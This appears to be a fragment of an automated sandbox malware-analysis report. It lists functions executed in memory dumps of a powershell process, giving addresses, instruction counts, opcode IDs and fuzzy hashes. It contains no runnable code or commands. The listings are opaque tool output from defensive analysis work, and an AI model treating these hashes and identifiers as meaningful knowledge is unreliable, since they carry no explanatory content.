                                                    • Instruction Fuzzy Hash: 6C910FB4509705CFD310EF68C195B5ABBE4BF89308F00996CF488A7352D7B6A949CF52

                                                    Executed Functions

                                                    Function 04E47A70 Relevance: .6, Instructions: 566COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2473089523.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_4e40000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 508956a8072425bda8437458ef72af3a52a433706b8c4c3ef1be4669865cc092
                                                    • Instruction ID: 5f05b5eca78ffb7e71ebf87d791753f22bd0a47bc74bbd88f206c5cea4b821e7
                                                    • Opcode Fuzzy Hash: 508956a8072425bda8437458ef72af3a52a433706b8c4c3ef1be4669865cc092
                                                    • Instruction Fuzzy Hash: 3B21F739B001089FCB09DFA8E5849ADBBF2FFC8310B25C195E405AB361CB35EC469B90
                                                    Function 04E47040 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2473089523.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_4e40000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a9898f98f2982ce594593379f91f03a90e3dd4aaa483691e74289a7723e1c65
                                                    • Instruction ID: fc577997465ff3183174f0be4f3064c1bfbaa665b8fb4774cca55a482fec58cf
                                                    • Opcode Fuzzy Hash: 4a9898f98f2982ce594593379f91f03a90e3dd4aaa483691e74289a7723e1c65
                                                    • Instruction Fuzzy Hash: F7213BB4A05219DFCB04CF98D8909AEBBB4FF89300B14859AE519EB352D735FD41CBA1
                                                    Function 04E4703F Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2473089523.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_4e40000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 252e987ddcf941b8d9625fd917647d3272202765d17d468663a5f7ad97adda05
                                                    • Instruction ID: 85ba29af10e4f67ea32345e7c9fbd2e3c4548fe1f6a083bb5439364102cad1db
                                                    • Opcode Fuzzy Hash: 252e987ddcf941b8d9625fd917647d3272202765d17d468663a5f7ad97adda05
                                                    • Instruction Fuzzy Hash: B811D4B8A0020ADFCB04DF99D5809AEFBB5FF88310B148569E909AB351C731FD41CBA1
                                                    Function 04E47AA4 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2473089523.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_4e40000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b4fe8ba717c7270a8846d93ee3e52fa16961e3a333bacdc74bfaec72b0e09f2
                                                    • Instruction ID: 32ed25ac4789f9cbd3fe19c64135fcd0fc7bd76e729384dacf6ea6ea34659b58
                                                    • Opcode Fuzzy Hash: 2b4fe8ba717c7270a8846d93ee3e52fa16961e3a333bacdc74bfaec72b0e09f2
                                                    • Instruction Fuzzy Hash: D411A539A011089FCB04DF99E58499DFBF2FF88314F25D1A5E804A7765C735AD85CB90
                                                    Function 0354D01D Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2472627033.000000000354D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0354D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_354d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c11343f6801ff5d74edb560d2ea2eb2eef7a4cb722309611dd0728803d0326a1
                                                    • Instruction ID: ca6aad3a0eab99d1ff51305acbf67147372694ef649e1b9c73e519449171f667
                                                    • Opcode Fuzzy Hash: c11343f6801ff5d74edb560d2ea2eb2eef7a4cb722309611dd0728803d0326a1
                                                    • Instruction Fuzzy Hash: B901F7714043449AE714CA25E984B66FFE8EF41328F0CC45AED4C0B163D6B99441C6B1
                                                    Function 0354D006 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2472627033.000000000354D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0354D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_354d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 380f0561108372039b90dc7c44acbbd8304dc99c4ce45a6fa556f7d990eaa149
                                                    • Instruction ID: ee5485d667d1ff01809a4ae3fe45f608aa15bd56756536e65837af700feef158
                                                    • Opcode Fuzzy Hash: 380f0561108372039b90dc7c44acbbd8304dc99c4ce45a6fa556f7d990eaa149
                                                    • Instruction Fuzzy Hash: 5F01217240E3C45FD7168B259894B52BFB4AF43224F1D80CBD9888F1A3D2695844C772
                                                    Function 04E42CB6 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2473089523.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_4e40000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9f5a02984e0f891237ae6577a1aa40b9984a4892315e566ca1c2926a4aa1891
                                                    • Instruction ID: 0cdecb0a8fac0e241282391fba98690c8f855fa3608dac4f98bff07faad8425b
                                                    • Opcode Fuzzy Hash: b9f5a02984e0f891237ae6577a1aa40b9984a4892315e566ca1c2926a4aa1891
                                                    • Instruction Fuzzy Hash: 4CF0DA35A00109DFCB15CF9DD990AEEF7B1FF88324F208199E515A72A1C732AC52CB50